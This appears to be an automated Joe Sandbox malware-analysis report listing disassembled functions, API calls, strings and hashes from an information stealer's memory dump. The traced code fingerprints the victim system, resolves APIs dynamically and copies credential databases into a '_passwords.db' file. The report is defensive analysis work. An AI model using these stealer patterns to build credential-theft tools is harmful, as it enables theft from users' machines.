                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F291C: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,0091761F,?,?,?), ref: 008F2934
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F291C: RtlAllocateHeap.NTDLL(00000000), ref: 008F293B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F291C: GetLocalTime.KERNEL32(?), ref: 008F2947
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F291C: wsprintfA.USER32 ref: 008F2972
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: _memset.LIBCMT ref: 008F3263
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 008F3282
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 008F32A7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: RegCloseKey.ADVAPI32(?,?,?,?), ref: 008F32B3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3230: CharToOemA.USER32(?,?), ref: 008F32C7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 008F32FB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: _memset.LIBCMT ref: 008F332A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: lstrcat.KERNEL32(?,00000000), ref: 008F3352
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: lstrcat.KERNEL32(?,00917E68), ref: 008F336F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 008F2631
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008F2671
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 008F26C6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: RtlAllocateHeap.NTDLL(00000000), ref: 008F26CD
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(Path: ,009178BC,HWID: ,009178B0,GUID: ,009178A4,00000000,MachineID: ,00917894,00000000,Date: ,00917888,00917884,11.8,Version: ,0091761F), ref: 008F5B18
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3EE1: OpenProcess.KERNEL32(00000410,00000000,008F5B27,00000000,?), ref: 008F3F03
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3EE1: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008F3F1E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3EE1: CloseHandle.KERNEL32(00000000), ref: 008F3F25
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F278C: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F5BD2,Windows: ,009178E0), ref: 008F27A0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F278C: RtlAllocateHeap.NTDLL(00000000), ref: 008F27A7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: __EH_prolog3_catch_GS.LIBCMT ref: 008F346A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: CoInitializeEx.COMBASE(00000000,00000000), ref: 008F347B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008F348C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: CoCreateInstance.COMBASE(00913F70,00000000,00000001,00913EA0,?), ref: 008F34A6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008F34DC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3463: VariantInit.OLEAUT32(?), ref: 008F3537
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: __EH_prolog3_catch.LIBCMT ref: 008F35FA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: CoInitializeEx.COMBASE(00000000,00000000), ref: 008F3609
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008F361A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: CoCreateInstance.COMBASE(00913F70,00000000,00000001,00913EA0,?), ref: 008F3634
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008F366A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F35F3: VariantInit.OLEAUT32(?), ref: 008F36B9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E1375), ref: 008F28ED
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: RtlAllocateHeap.NTDLL(00000000), ref: 008F28F4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: GetComputerNameA.KERNEL32(00000000,008E1375), ref: 008F2908
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E13A9), ref: 008F28BB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: RtlAllocateHeap.NTDLL(00000000), ref: 008F28C2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: GetUserNameA.ADVAPI32(00000000,008E13A9), ref: 008F28D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 008F31D1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: GetDeviceCaps.GDI32(00000000,00000008), ref: 008F31DC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: GetDeviceCaps.GDI32(00000000,0000000A), ref: 008F31E7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: ReleaseDC.USER32(00000000,00000000), ref: 008F31F2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,008F5DD5,?,Display Resolution: ,00917934,00000000,User Name: ,00917924,00000000,Computer Name: ,00917910,AV: ,00917904), ref: 008F31FE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 008F3205
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F31BF: wsprintfA.USER32 ref: 008F3217
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: GetKeyboardLayoutList.USER32(00000000,00000000,00917812,?,?), ref: 008F2A68
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: LocalAlloc.KERNEL32(00000040,00000000), ref: 008F2A76
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008F2A84
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 008F2AB3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2A37: LocalFree.KERNEL32(00000000), ref: 008F2B5B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F298A: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 008F29A5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F298A: RtlAllocateHeap.NTDLL(00000000), ref: 008F29AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F298A: GetTimeZoneInformation.KERNEL32(?), ref: 008F29BB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F298A: wsprintfA.USER32 ref: 008F29D9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ,0091796C), ref: 008F2BC1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: RtlAllocateHeap.NTDLL(00000000), ref: 008F2BC8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,009178C8,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ), ref: 008F2BE6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: RegQueryValueExA.KERNEL32(009178C8,00000000,00000000,00000000,000000FF,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000), ref: 008F2C02
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2BAD: RegCloseKey.ADVAPI32(009178C8,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ,0091796C,Keyboard Languages: ,00917950), ref: 008F2C0B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2C63: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 008F2CD9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2C63: wsprintfA.USER32 ref: 008F2D37
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2C16: GetSystemInfo.KERNEL32(?), ref: 008F2C30
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2C16: wsprintfA.USER32 ref: 008F2C48
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2D75: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00917950,Display Resolution: ,00917934,00000000,User Name: ,00917924,00000000,Computer Name: ,00917910,AV: ,00917904,Install Date: ), ref: 008F2D8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2D75: RtlAllocateHeap.NTDLL(00000000), ref: 008F2D94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2D75: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 008F2DB0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2D75: wsprintfA.USER32 ref: 008F2DD6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2DEE: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 008F2E45
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3101: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00917817,?,?), ref: 008F3130
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3101: Process32First.KERNEL32(00000000,00000128), ref: 008F3140
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3101: Process32Next.KERNEL32(00000000,00000128), ref: 008F319E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3101: CloseHandle.KERNEL32(00000000), ref: 008F31A9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00917816,00000000,?,?), ref: 008F2ECF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 008F2F0C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: wsprintfA.USER32 ref: 008F2F39
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 008F2F58
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 008F2F8E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: lstrlen.KERNEL32(?), ref: 008F2FA3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00917E28), ref: 008F3038
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegCloseKey.ADVAPI32(?), ref: 008F30A2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2E5F: RegCloseKey.ADVAPI32(?), ref: 008F30CE
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00917950,Display Resolution: ,00917934,00000000,User Name: ,00917924,00000000), ref: 008F62A0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Allocate$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                                                                                                                    • String ID: 11.8$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                                                                    • API String ID: 2795203874-3952884412
                                                                                                                                                                                                                                                                                                                    • Opcode ID: bc8415c3fa34e654094af888d255de9d07ac6b77833d1ee8aa17465639f51e17
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 47be5cc4db8022136047abcc6e6130864fc8bfb078ec37e3b4b8c1be91db52eb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc8415c3fa34e654094af888d255de9d07ac6b77833d1ee8aa17465639f51e17
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E522332D0405EAACF00FBA9EC429EDBB74FF05304F5145A2B610B7162DB717F5A8A96
                                                                                                                                                                                                                                                                                                                    Function 008F9E25 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 2083 8f9e25-8f9e35 call 8f9d79 2086 8f9e3b-8fa021 call 8e7c77 GetProcAddress * 20 2083->2086 2087 8fa026-8fa083 LoadLibraryA * 5 2083->2087 2086->2087 2089 8fa097-8fa09e 2087->2089 2090 8fa085-8fa092 GetProcAddress 2087->2090 2092 8fa0c9-8fa0d0 2089->2092 2093 8fa0a0-8fa0c4 GetProcAddress * 2 2089->2093 2090->2089 2094 8fa0e4-8fa0eb 2092->2094 2095 8fa0d2-8fa0df GetProcAddress 2092->2095 2093->2092 2096 8fa0ff-8fa106 2094->2096 2097 8fa0ed-8fa0fa GetProcAddress 2094->2097 2095->2094 2099 8fa108-8fa12c GetProcAddress * 2 2096->2099 2100 8fa131 2096->2100 2097->2096 2099->2100
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9E66
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9E7D
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9E94
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9EAB
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9EC2
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9ED9
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9EF0
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F07
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F1E
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F35
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F4C
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F63
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F7A
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9F91
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9FA8
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9FBF
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9FD6
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008F9FED
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008FA004
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008FA01B
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA02C
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA03D
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA04E
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA05F
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,008F9CA1), ref: 008FA070
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75670000,008F9CA1), ref: 008FA08C
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75750000,008F9CA1), ref: 008FA0A7
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008FA0BE
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(76BE0000,008F9CA1), ref: 008FA0D9
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(759D0000,008F9CA1), ref: 008FA0F4
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(773F0000,008F9CA1), ref: 008FA10F
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 008FA126
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2238633743-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9aa4e1622d9410c7b3bcf8576897a08a76c793534da2bea71ab2b17f18943601
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9316da20e0ec3831845f2ec151a8f0fa210a6176e74b00a549039cccee8a71bc
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa4e1622d9410c7b3bcf8576897a08a76c793534da2bea71ab2b17f18943601
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E771F579801215FFDB3A9F64EE4AD653BA2FB183463004525EA55E3230EF365863EF11
                                                                                                                                                                                                                                                                                                                    Function 008E9777 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 195memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008E981D
                                                                                                                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 008E9828
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 008E9837
                                                                                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008E989A
                                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 008E98B0
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008E98C7
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E98CE
                                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 008E98E7
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008E98FF
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 008E990B
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E9912
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008E9921
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,0091833C), ref: 008E992D
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008E9937
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,_passwords.db), ref: 008E9943
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,008EAE7A), ref: 008E997A
                                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 008E9981
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008E998C
                                                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 008E9993
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008E999C
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
